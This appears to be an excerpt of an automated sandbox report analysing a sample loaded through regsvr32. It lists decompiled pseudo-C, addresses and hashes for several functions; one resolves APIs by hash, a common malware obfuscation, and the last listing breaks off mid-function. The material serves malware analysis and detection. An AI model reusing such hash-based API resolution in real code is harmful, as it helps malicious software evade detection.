                                Function 00737FD4 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 170memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 45%
                                			E00737FD4(void* __ecx, signed int __edx, void* __ebp, long long* __rax, long long __rbx, void* __rcx, long long __rsi, char* __r8) {
				void* __rdi;
				signed int _t34;
				void* _t48;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t67;
				void* _t99;
				char* _t101;
				long long _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				signed long long _t123;

				_t78 = __rbx;
				_t77 = __rax;
				_t67 = __ebp;
				_t55 = __ecx;
				 *((long long*)(_t110 + 8)) = __rbx;
				 *((long long*)(_t110 + 0x18)) = _t107;
				 *((long long*)(_t110 + 0x20)) = __rsi;
				_push(_t123);
				_t111 = _t110 - 0x40;
				r14d =  *0x73d450;
				_t108 = __rcx;
				_t81 =  *0x73d458;
				_t105 =  *((intOrPtr*)( *0x73d458 + 8));
				r12d = 0;
				_t34 = r14d ^ __edx;
				_t101 = __r8;
				if(_t34 == 0x139d2b8d) {
					L20:
					_t78 =  *(_t108 + 0x50);
					if( *(_t108 + 0x50) == 0) {
						_t54 = 0x426;
					} else {
						E0073908C(0xf2d20ec6, _t77,  *((intOrPtr*)(_t81 + 0x18)));
						if(_t77 == 0) {
						} else {
							 *_t77();
						}
						asm("sbb ebx, ebx");
						_t54 = _t53 + 0x4ce;
					}
					if(r12d == 0 || _t54 != 0x426) {
						L43:
						if( *((long long*)(_t111 + 0x80)) != 0 && _t54 != 0x3e5) {
							r8d = _t54;
							E00736AC0(_t54, _t55, _t67, _t77, _t78, _t108,  *((intOrPtr*)(_t111 + 0x80)), _t105, _t108);
						}
						return _t54;
					} else {
						L31:
						_t54 = 0x57;
						if(_t101 == 0 ||  *_t101 == 0) {
							L37:
							r12d = 1;
							if(_t54 != 0) {
								goto L43;
							}
							L38:
							_t105 =  *(_t108 + 0x50);
							if( *(_t108 + 0x50) == 0) {
								_t54 = 0x426;
							} else {
								 *(_t108 + 0x50) =  *(_t108 + 0x50) & 0x00000000;
								_t77 =  *0x73d458;
								_t78 =  *((intOrPtr*)( *0x73d458 + 8));
								E00732874(_t54, _t55,  *((intOrPtr*)( *0x73d458 + 8)), _t105, _t101, _t105);
								HeapFree(??, ??, ??);
								_t54 = 0;
							}
							if(r12d != 0) {
								_t27 = _t111 + 0x30; // 0x31
								_t54 = E00739214(_t78, _t27, _t101, _t105, _t108,  *((intOrPtr*)(_t108 + 0x38)), _t108 + 0x50);
							}
							goto L43;
						} else {
							E0073487A();
							_t98 = _t111 + 0x30;
							if(E00735448(_t55, _t77, _t78, _t101, _t111 + 0x30, _t105, _t108) != 0) {
								L36:
								_t54 = 0;
								goto L37;
							}
							if(E0073672C(_t101, _t98, _t111 + 0x68) == 0) {
								goto L37;
							}
							asm("ror ax, 0x8");
							 *((short*)(_t111 + 0x32)) =  *(_t111 + 0x68) & 0x0000ffff;
							goto L36;
						}
					}
				}
				if(_t34 == 0x15f5a8c2) {
					if(r9d == 0) {
						L15:
						_t54 = 0x57;
						goto L43;
					}
					E007385CC(r9d, __rbx, __r8, _t105);
					if(_t77 == 0) {
						L14:
						_t54 = 8;
						goto L43;
					}
					_t99 = 0x735c80;
					L11:
					 *(_t111 + 0x20) =  *(_t111 + 0x20) & _t123;
					_t48 = E007314B8(_t53, _t55, _t77, _t78, _t108, _t99, _t105, _t77,  *((intOrPtr*)(_t111 + 0x80)));
					_t54 = _t48;
					if(_t48 != 0) {
						HeapFree();
					} else {
						_t54 = 0x3e5;
					}
					goto L43;
				}
				if(_t34 == 0x2f77acf9) {
					r12d = 1;
					goto L20;
				}
				if(_t34 == 0x48e12436) {
					goto L38;
				}
				if(_t34 == 0x4d382929) {
					goto L31;
				}
				if(_t34 == 0xb016dc39) {
					E0073908C(0xd97160e4, __rax,  *((intOrPtr*)(_t81 + 0x18)));
					if(_t77 != 0) {
						 *_t77();
					}
					_t54 = 0;
					goto L43;
				}
				if(_t34 == 0xb057dfc9) {
					if(r9d == 0) {
						goto L15;
					}
					E007385CC(r9d, __rbx, __r8, _t105);
					if(_t77 == 0) {
						goto L14;
					}
					_t99 = 0x7334a4;
					goto L11;
				} else {
					_t5 = _t123 + 1; // 0x1
					_t54 = _t5;
					goto L43;
				}
			}

















                                0x00737fd4
                                0x00737fd4
                                0x00737fd4
                                0x00737fd4
                                0x00737fd4
                                0x00737fd9
                                0x00737fde
                                0x00737fe4
                                0x00737fe8
                                0x00737fec
                                0x00737ff3
                                0x00737ff6
                                0x00737ffd
                                0x00738004
                                0x00738007
                                0x00738009
                                0x00738011
                                0x007380ef
                                0x007380ef
                                0x007380f6
                                0x0073814a
                                0x007380f8
                                0x00738101
                                0x00738109
                                0x0073810b
                                0x00738111
                                0x00738111
                                0x00738140
                                0x00738142
                                0x00738142
                                0x00738152
                                0x0073821b
                                0x00738224
                                0x00738236
                                0x0073823c
                                0x0073823c
                                0x0073825b
                                0x00738164
                                0x00738164
                                0x00738164
                                0x0073816c
                                0x007381be
                                0x007381be
                                0x007381c6
                                0x00000000
                                0x00000000
                                0x007381c8
                                0x007381c8
                                0x007381cf
                                0x007381fb
                                0x007381d1
                                0x007381d1
                                0x007381d6
                                0x007381e0
                                0x007381e4
                                0x007381f1
                                0x007381f7
                                0x007381f7
                                0x00738203
                                0x0073820d
                                0x00738219
                                0x00738219
                                0x00000000
                                0x00738173
                                0x00738185
                                0x0073818a
                                0x00738199
                                0x007381bc
                                0x007381bc
                                0x00000000
                                0x007381bc
                                0x007381ac
                                0x00000000
                                0x00000000
                                0x007381b3
                                0x007381b7
                                0x00000000
                                0x007381b7
                                0x0073816c
                                0x00738152
                                0x0073801c
                                0x00738118
                                0x007380bf
                                0x007380bf
                                0x00000000
                                0x007380bf
                                0x00738120
                                0x0073812b
                                0x007380b5
                                0x007380b5
                                0x00000000
                                0x007380b5
                                0x0073812d
                                0x0073807a
                                0x00738082
                                0x0073808d
                                0x00738092
                                0x00738096
                                0x007380aa
                                0x00738098
                                0x00738098
                                0x00738098
                                0x00000000
                                0x00738096
                                0x00738027
                                0x007380e9
                                0x00000000
                                0x007380e9
                                0x00738032
                                0x00000000
                                0x00000000
                                0x0073803d
                                0x00000000
                                0x00000000
                                0x00738048
                                0x007380d2
                                0x007380da
                                0x007380e0
                                0x007380e0
                                0x007380e2
                                0x00000000
                                0x007380e2
                                0x0073804f
                                0x0073805e
                                0x00000000
                                0x00000000
                                0x00738066
                                0x00738071
                                0x00000000
                                0x00000000
                                0x00738073
                                0x00000000
                                0x00738051
                                0x00738051
                                0x00738051
                                0x00000000
                                0x00738051

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: ))8M$6$H$lJu
                                • API String ID: 3298025750-2816507560
                                • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction ID: 0d2e2e900af96e964d89dc15baad65124a3dd91add26df510cf94221701484b8
                                • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction Fuzzy Hash: 0751D621704B8582FBA99BA6D88436A5361FB84BC4F588026FF4A4775BDF7CC846C302
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EF964 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E00007FFC7FFC130EF964(void* __edx, long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
				long long _v72;
				intOrPtr _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				void* _t36;
				void* _t43;
				void* _t44;
				signed long long _t65;
				long long _t67;
				long long _t68;
				long long _t69;
				long long _t76;
				void* _t81;
				void* _t88;
				long long _t104;
				void* _t110;
				intOrPtr* _t112;
				void* _t114;
				void* _t117;
				intOrPtr _t129;
				void* _t131;
				void* _t132;
				signed long long _t133;
				signed long long _t134;
				signed long long _t137;
				intOrPtr* _t138;

				_t43 = __edx;
				_a8 = __rbx;
				_a16 = __rdx;
				if (__rdx != 0) goto 0x130ef9a0;
				_t33 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t33);
				goto 0x130efb40;
				asm("xorps xmm0, xmm0");
				 *((long long*)(__rdx)) = 0;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = 0;
				if ( *__rcx == 0) goto 0x130efa0b;
				_a24 = 0x3f2a;
				_a26 = dil;
				E00007FFC7FFC130F3218( *((intOrPtr*)(0x16)),  &_a24);
				if (0x16 != 0) goto 0x130ef9e2;
				r8d = 0;
				_t36 = E00007FFC7FFC130EFB70(0x16,  *((intOrPtr*)(0x16)), 0, 0, _t110, _t114, _t117,  &_v88);
				goto 0x130ef9ee;
				0x130efc80();
				r14d = _t36;
				if (0x16 != 0) goto 0x130ef9fe;
				goto 0x130ef9b2;
				goto 0x130efb04;
				_t112 = _v88;
				_t129 = _v80;
				_a24 = 0;
				_t65 = _t129 - _t112;
				_t137 = (_t65 >> 3) + 1;
				_t88 =  >  ? 0 : _t65 + 7 >> 3;
				_t134 = _t133 | 0xffffffff;
				if (_t88 == 0) goto 0x130efa6d;
				_t67 = _t134 + 1;
				if ( *((intOrPtr*)( *_t112 + _t67)) != dil) goto 0x130efa4e;
				if (1 != _t88) goto 0x130efa48;
				_a24 = 1 + _t67;
				r8d = 1;
				E00007FFC7FFC130ED6D0(_t137, 1 + _t67, 1);
				_t76 = _t67;
				if (_t67 == 0) goto 0x130efafd;
				_t104 = _t67 + _t137 * 8;
				_t138 = _t112;
				_v96 = _t104;
				_t68 = _t104;
				_a32 = _t104;
				if (_t112 == _t129) goto 0x130efaf3;
				_v104 = _t76 - _t112;
				_t131 = _t134 + 1;
				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x130efaad;
				_t132 = _t131 + 1;
				E00007FFC7FFC130F3144(_t43, _t68, _t76, _t68, _t104 - _t68 + _a24, _t132);
				if (_t68 != 0) goto 0x130efb58;
				_t69 = _a32;
				 *((long long*)(_v104 + _t138)) = _t69;
				_a32 = _t69 + _t132;
				if (_t138 + 8 != _t129) goto 0x130efaa7;
				r14d = _t44;
				 *_a16 = _t76;
				E00007FFC7FFC130EE114(_a16, 0);
				_t81 =  >  ? 0 : _t129 - _t112 + 7 >> 3;
				if (_t81 == 0) goto 0x130efb35;
				E00007FFC7FFC130EE114(_a16,  *_t112);
				if (1 != _t81) goto 0x130efb21;
				E00007FFC7FFC130EE114(_a16, _t112);
				return r14d;
			}


































                                0x7ffc130ef964
                                0x7ffc130ef964
                                0x7ffc130ef969
                                0x7ffc130ef988
                                0x7ffc130ef98a
                                0x7ffc130ef992
                                0x7ffc130ef994
                                0x7ffc130ef99b
                                0x7ffc130ef9a0
                                0x7ffc130ef9a3
                                0x7ffc130ef9a9
                                0x7ffc130ef9ae
                                0x7ffc130ef9b2
                                0x7ffc130ef9bb
                                0x7ffc130ef9c1
                                0x7ffc130ef9c5
                                0x7ffc130ef9d0
                                0x7ffc130ef9d6
                                0x7ffc130ef9db
                                0x7ffc130ef9e0
                                0x7ffc130ef9e9
                                0x7ffc130ef9ee
                                0x7ffc130ef9f3
                                0x7ffc130ef9fc
                                0x7ffc130efa06
                                0x7ffc130efa0b
                                0x7ffc130efa12
                                0x7ffc130efa1c
                                0x7ffc130efa20
                                0x7ffc130efa2d
                                0x7ffc130efa3b
                                0x7ffc130efa3f
                                0x7ffc130efa46
                                0x7ffc130efa4e
                                0x7ffc130efa55
                                0x7ffc130efa67
                                0x7ffc130efa69
                                0x7ffc130efa6d
                                0x7ffc130efa79
                                0x7ffc130efa7e
                                0x7ffc130efa84
                                0x7ffc130efa86
                                0x7ffc130efa8a
                                0x7ffc130efa8d
                                0x7ffc130efa91
                                0x7ffc130efa94
                                0x7ffc130efa9b
                                0x7ffc130efaa3
                                0x7ffc130efaad
                                0x7ffc130efab4
                                0x7ffc130efab9
                                0x7ffc130efac6
                                0x7ffc130efacd
                                0x7ffc130efad3
                                0x7ffc130efadf
                                0x7ffc130efaea
                                0x7ffc130efaf1
                                0x7ffc130efaf7
                                0x7ffc130efafa
                                0x7ffc130efaff
                                0x7ffc130efb18
                                0x7ffc130efb1f
                                0x7ffc130efb24
                                0x7ffc130efb33
                                0x7ffc130efb38
                                0x7ffc130efb57

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFC130EF994
                                  • Part of subcall function 00007FFC130EE5A0: IsProcessorFeaturePresent.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5A9
                                  • Part of subcall function 00007FFC130EE5A0: GetCurrentProcess.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                • String ID: *?$.
                                • API String ID: 4036615347-3972193922
                                • Opcode ID: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction ID: f95dd1a1179fcd6098ac39930be04504ea9cde9839ea17868ce99e4dd37e3983
                                • Opcode Fuzzy Hash: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction Fuzzy Hash: 30510162B15FA981EB10DFA298000B963E4FB44BECB454536DE1D27BC9EE3CD466C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EE9E0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 197COMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E00007FFC7FFC130EE9E0(void* __rax, long long __rbx, signed int* __rcx, char* __rdx, long long _a8) {
				long long _v24;
				signed char _t21;
				void* _t27;
				void* _t29;
				void* _t41;
				signed int _t47;
				signed int _t52;
				signed int _t68;
				char* _t84;
				char* _t85;
				char* _t87;
				char* _t89;
				char* _t90;
				void* _t91;
				void* _t92;
				char _t98;
				void* _t103;
				void* _t121;

				_a8 = __rbx;
				_t68 =  *0x13124dc8; // 0x0
				_v24 = 0;
				asm("movsd xmm0, [esp+0x20]");
				asm("movsd [edi], xmm0");
				__rcx[2] = 0;
				__rcx[1] = _t68;
				if ( *__rdx != 0x20) goto 0x130eea1a;
				_t84 = __rdx + 1;
				if ( *_t84 == 0x20) goto 0x130eea12;
				if ( *_t84 == 0x61) goto 0x130eea40;
				if ( *_t84 == 0x72) goto 0x130eea35;
				if ( *_t84 != 0x77) goto 0x130eec5d;
				 *__rcx = 0x301;
				goto 0x130eea46;
				 *__rcx =  *__rcx & 0;
				__rcx[1] = 1;
				goto 0x130eea4d;
				 *__rcx = 0x109;
				__rcx[1] = 2;
				_t85 = _t84 + 1;
				r9b = 0;
				r11b = 0;
				r10b = 0;
				r8b = 0;
				if ( *_t85 == 0) goto 0x130eeb8b;
				_t98 =  *_t85;
				_t41 = _t98 - 0x53;
				if (_t41 > 0) goto 0x130eeb0c;
				if (_t41 == 0) goto 0x130eeafc;
				if (_t41 == 0) goto 0x130eeb79;
				if (_t41 == 0) goto 0x130eead0;
				if (_t41 == 0) goto 0x130eeac8;
				if (_t41 == 0) goto 0x130eeab6;
				_t103 = _t98 - 0xfffffffffffffff2;
				if (_t41 == 0) goto 0x130eeaad;
				if (_t103 != 4) goto 0x130eec5d;
				if (r10b != 0) goto 0x130eeb6d;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0x130eeb04;
				asm("bts dword [edi], 0x7");
				goto 0x130eeb77;
				if ((_t21 & 0x00000040) != 0) goto 0x130eeb6d;
				goto 0x130eeb75;
				r8b = 1;
				goto 0x130eeb6d;
				if (r11b != 0) goto 0x130eeb6d;
				r11b = 1;
				if ((_t21 & 0x00000002) != 0) goto 0x130eeb6d;
				 *__rcx =  *__rcx & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0x130eeb77;
				_t47 = r10b;
				if (_t47 != 0) goto 0x130eeb6d;
				 *__rcx =  *__rcx | 0x00000020;
				r10b = 1;
				goto 0x130eeb79;
				if (_t47 == 0) goto 0x130eeb65;
				if (_t47 == 0) goto 0x130eeb56;
				if (_t47 == 0) goto 0x130eeb44;
				if (_t47 == 0) goto 0x130eeb38;
				if (_t103 - 0x3a != 6) goto 0x130eec5d;
				if (( *__rcx & 0x0000c000) != 0) goto 0x130eeb6d;
				asm("bts eax, 0xe");
				goto 0x130eeb75;
				if (r9b != 0) goto 0x130eeb6d;
				asm("btr dword [edi+0x4], 0xb");
				goto 0x130eeb4e;
				if (r9b != 0) goto 0x130eeb6d;
				asm("bts dword [edi+0x4], 0xb");
				r9b = 1;
				goto 0x130eeb79;
				_t52 =  *__rcx & 0x0000c000;
				if (_t52 != 0) goto 0x130eeb6d;
				asm("bts eax, 0xf");
				goto 0x130eeb75;
				asm("bt eax, 0xc");
				if (_t52 >= 0) goto 0x130eeb71;
				goto 0x130eeb79;
				asm("bts eax, 0xc");
				if (1 != 0) goto 0x130eea5e;
				if (r8b == 0) goto 0x130eeb93;
				_t87 = _t85 + 1;
				if ( *_t87 == 0x20) goto 0x130eeb90;
				if (r8b != 0) goto 0x130eebaf;
				if ( *_t87 != 0) goto 0x130eec5d;
				__rcx[2] = 1;
				goto 0x130eec6d;
				r8d = 3;
				E00007FFC7FFC130F1B40(_t29, _t87, 0x1310ed38, _t121);
				if (0 != 0) goto 0x130eec5d;
				goto 0x130eebd5;
				_t89 = _t87 + 4;
				if ( *_t89 == 0x20) goto 0x130eebd2;
				if ( *_t89 != 0x3d) goto 0x130eec5d;
				_t90 = _t89 + 1;
				if ( *_t90 == 0x20) goto 0x130eebdf;
				r8d = 5;
				E00007FFC7FFC130F1C08(1, 0, _t90);
				if (0 != 0) goto 0x130eec0a;
				_t91 = _t90 + 5;
				asm("bts dword [edi], 0x12");
				goto 0x130eec53;
				r8d = 8;
				E00007FFC7FFC130F1C08(1, 0, _t91);
				if (0 != 0) goto 0x130eec2d;
				_t92 = _t91 + 8;
				asm("bts dword [edi], 0x11");
				goto 0x130eec53;
				r8d = 7;
				E00007FFC7FFC130F1C08(1, 0, _t92);
				if (0 != 0) goto 0x130eec5d;
				asm("bts dword [edi], 0x10");
				goto 0x130eec53;
				if ( *((char*)(_t92 + 8)) == 0x20) goto 0x130eec50;
				goto 0x130eeb9d;
				_t27 = E00007FFC7FFC130EE6A0(0);
				 *((long long*)(0)) = 0x16;
				return E00007FFC7FFC130EE580(_t27);
			}





















                                0x7ffc130ee9e0
                                0x7ffc130ee9ea
                                0x7ffc130ee9fb
                                0x7ffc130eea00
                                0x7ffc130eea06
                                0x7ffc130eea0a
                                0x7ffc130eea0d
                                0x7ffc130eea10
                                0x7ffc130eea12
                                0x7ffc130eea18
                                0x7ffc130eea1d
                                0x7ffc130eea22
                                0x7ffc130eea27
                                0x7ffc130eea2d
                                0x7ffc130eea33
                                0x7ffc130eea35
                                0x7ffc130eea37
                                0x7ffc130eea3e
                                0x7ffc130eea40
                                0x7ffc130eea46
                                0x7ffc130eea4d
                                0x7ffc130eea50
                                0x7ffc130eea53
                                0x7ffc130eea56
                                0x7ffc130eea59
                                0x7ffc130eea61
                                0x7ffc130eea67
                                0x7ffc130eea6a
                                0x7ffc130eea6d
                                0x7ffc130eea73
                                0x7ffc130eea7c
                                0x7ffc130eea85
                                0x7ffc130eea8a
                                0x7ffc130eea8f
                                0x7ffc130eea91
                                0x7ffc130eea94
                                0x7ffc130eea99
                                0x7ffc130eeaa2
                                0x7ffc130eeaa8
                                0x7ffc130eeaab
                                0x7ffc130eeaad
                                0x7ffc130eeab1
                                0x7ffc130eeaba
                                0x7ffc130eeac3
                                0x7ffc130eeac8
                                0x7ffc130eeacb
                                0x7ffc130eead3
                                0x7ffc130eeadb
                                0x7ffc130eeae0
                                0x7ffc130eeaec
                                0x7ffc130eeaf7
                                0x7ffc130eeafa
                                0x7ffc130eeafc
                                0x7ffc130eeaff
                                0x7ffc130eeb01
                                0x7ffc130eeb04
                                0x7ffc130eeb0a
                                0x7ffc130eeb0f
                                0x7ffc130eeb14
                                0x7ffc130eeb19
                                0x7ffc130eeb1e
                                0x7ffc130eeb23
                                0x7ffc130eeb30
                                0x7ffc130eeb32
                                0x7ffc130eeb36
                                0x7ffc130eeb3b
                                0x7ffc130eeb3d
                                0x7ffc130eeb42
                                0x7ffc130eeb47
                                0x7ffc130eeb49
                                0x7ffc130eeb4e
                                0x7ffc130eeb54
                                0x7ffc130eeb58
                                0x7ffc130eeb5d
                                0x7ffc130eeb5f
                                0x7ffc130eeb63
                                0x7ffc130eeb67
                                0x7ffc130eeb6b
                                0x7ffc130eeb6f
                                0x7ffc130eeb71
                                0x7ffc130eeb85
                                0x7ffc130eeb8e
                                0x7ffc130eeb90
                                0x7ffc130eeb96
                                0x7ffc130eeb9b
                                0x7ffc130eeba0
                                0x7ffc130eeba6
                                0x7ffc130eebaa
                                0x7ffc130eebaf
                                0x7ffc130eebbf
                                0x7ffc130eebc6
                                0x7ffc130eebd0
                                0x7ffc130eebd2
                                0x7ffc130eebd8
                                0x7ffc130eebdd
                                0x7ffc130eebdf
                                0x7ffc130eebe5
                                0x7ffc130eebe7
                                0x7ffc130eebf7
                                0x7ffc130eebfe
                                0x7ffc130eec00
                                0x7ffc130eec04
                                0x7ffc130eec08
                                0x7ffc130eec0a
                                0x7ffc130eec1a
                                0x7ffc130eec21
                                0x7ffc130eec23
                                0x7ffc130eec27
                                0x7ffc130eec2b
                                0x7ffc130eec2d
                                0x7ffc130eec3d
                                0x7ffc130eec44
                                0x7ffc130eec4a
                                0x7ffc130eec4e
                                0x7ffc130eec56
                                0x7ffc130eec58
                                0x7ffc130eec5d
                                0x7ffc130eec62
                                0x7ffc130eec7a

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                                • API String ID: 3215553584-2974328796
                                • Opcode ID: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                                • Instruction ID: d9a1f6b03bdfcfdbed7ee447770e303240d7aa242ef540ab3fabfea4184fdd53
                                • Opcode Fuzzy Hash: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                                • Instruction Fuzzy Hash: 26718C72F0DE7F86F7694A249A5433A2AD1AF1236CF189435CA1E625D1CB2CBC30D721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F243C Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E00007FFC7FFC130F243C(void* __ebx, void* __eflags, signed long long __rbx, long long* __rcx, signed int* __rdx, signed long long __rdi, void* __rsi, signed long long __r8) {
				void* __rbp;
				void* _t134;
				void* _t144;
				signed char _t148;
				signed char _t149;
				void* _t150;
				void* _t152;
				void* _t153;
				signed int _t169;
				signed long long* _t173;
				unsigned long long _t174;
				signed long long _t177;
				signed long long _t178;
				signed long long* _t181;
				intOrPtr _t187;
				long long _t193;
				long long* _t202;
				signed long long _t205;
				signed long long* _t206;
				signed long long _t215;
				signed long long _t229;
				intOrPtr _t238;
				signed long long _t239;
				signed long long _t268;
				signed long long _t270;
				signed int* _t275;
				void* _t278;
				void* _t279;
				signed long long* _t281;
				void* _t282;
				void* _t290;
				void* _t292;
				void* _t297;
				void* _t300;

				_t277 = __rsi;
				_t173 = _t281;
				_t173[1] = __rbx;
				_t173[2] = __rdi;
				_t173[3] = __r8;
				_t279 = _t173 - 0x47;
				_t282 = _t281 - 0xc0;
				r12d = r9d;
				r9d =  *(_t279 + 0x77);
				_t275 = __rdx;
				r8d =  *(_t279 + 0x6f);
				_t202 = __rcx;
				E00007FFC7FFC130F20A8(r12d, __eflags, _t173, __rcx, _t279 - 1, _t279);
				asm("movups xmm0, [eax]");
				asm("movups xmm1, xmm0");
				asm("psrldq xmm1, 0x8");
				asm("dec cx");
				 *(_t279 - 0x11) = _t300 >> 0x20;
				asm("movups [ebp-0x59], xmm0");
				asm("movsd xmm0, [eax+0x10]");
				asm("movsd [ebp-0x31], xmm0");
				asm("movsd [ebp-0x49], xmm0");
				if (r15d != 0xffffffff) goto 0x130f24c7;
				E00007FFC7FFC130EE680(_t173);
				 *_t173 =  *_t173 & 0x00000000;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FFC7FFC130EE6A0(_t173);
				_t174 =  *_t173;
				goto 0x130f280e;
				E00007FFC7FFC130F3C80(r12d, _t152, _t174, _t202, _t279 - 1, __rdx, __rdx, __rsi);
				 *__rdx = _t174;
				if (_t174 != 0xffffffff) goto 0x130f24eb;
				E00007FFC7FFC130EE680(_t174);
				 *_t174 =  *_t174 & 0x00000000;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FFC7FFC130EE6A0(_t174);
				 *_t174 = 0x18;
				goto 0x130f24bb;
				 *(_t282 + 0x30) =  *(_t282 + 0x30) & 0x00000000;
				r8d = r15d;
				 *(_t279 - 0x21) =  *(_t279 - 0x21) & 0x00000000;
				 *_t202 = 1;
				_t205 =  *(_t279 - 0x49) >> 0x00000020 |  *(_t279 - 0x49);
				_t177 =  !(_t174 >> 7) & 0x00000001;
				 *(_t282 + 0x28) = _t205;
				 *((long long*)(_t282 + 0x20)) =  *((intOrPtr*)(_t279 - 0x51));
				 *((long long*)(_t279 - 0x29)) = 0x18;
				 *(_t279 - 0x19) = _t177;
				 *(_t279 - 0x39) = _t205;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				r14d =  *((intOrPtr*)(_t279 - 0x55));
				if (_t177 != 0xffffffff) goto 0x130f25df;
				_t178 = _t177 & 0xc0000000;
				if (_t178 != 0xc0000000) goto 0x130f25ac;
				if ((r12b & 0x00000001) == 0) goto 0x130f25ac;
				 *(_t282 + 0x30) =  *(_t282 + 0x30) & 0x00000000;
				asm("inc ecx");
				 *((intOrPtr*)(_t279 - 0x55)) = r14d;
				r8d = r15d;
				 *(_t282 + 0x28) = _t205;
				 *((long long*)(_t282 + 0x20)) =  *((intOrPtr*)(_t279 - 0x51));
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				 *(_t279 - 0x41) = _t178;
				if (_t178 != 0xffffffff) goto 0x130f25df;
				_t215 =  *__rdx;
				_t181 =  *((intOrPtr*)(0x13124970 + (_t215 >> 6) * 8));
				 *(_t181 + ((_t215 & 0x0000003f) << 6) + 0x38) =  *(_t181 + ((_t215 & 0x0000003f) << 6) + 0x38) & 0x000000fe;
				GetLastError();
				E00007FFC7FFC130EE630(_t150, _t181, _t205);
				goto 0x130f24bb;
				GetFileType(_t300);
				if (_t181 != 0) goto 0x130f263d;
				GetLastError();
				_t206 = _t181;
				E00007FFC7FFC130EE630(_t150, _t181, _t206);
				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + (( *__rdx & 0x0000003f) << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + (( *__rdx & 0x0000003f) << 6) + 0x38) & 0x000000fe;
				CloseHandle(_t297);
				if (_t206 != 0) goto 0x130f24bb;
				E00007FFC7FFC130EE6A0(_t181);
				 *_t181 = 0xd;
				goto 0x130f24bb;
				if (_t181 != 2) goto 0x130f264a;
				goto 0x130f2652;
				if (_t181 != 3) goto 0x130f2652;
				_t148 =  *(_t279 - 0x59) | 0x48;
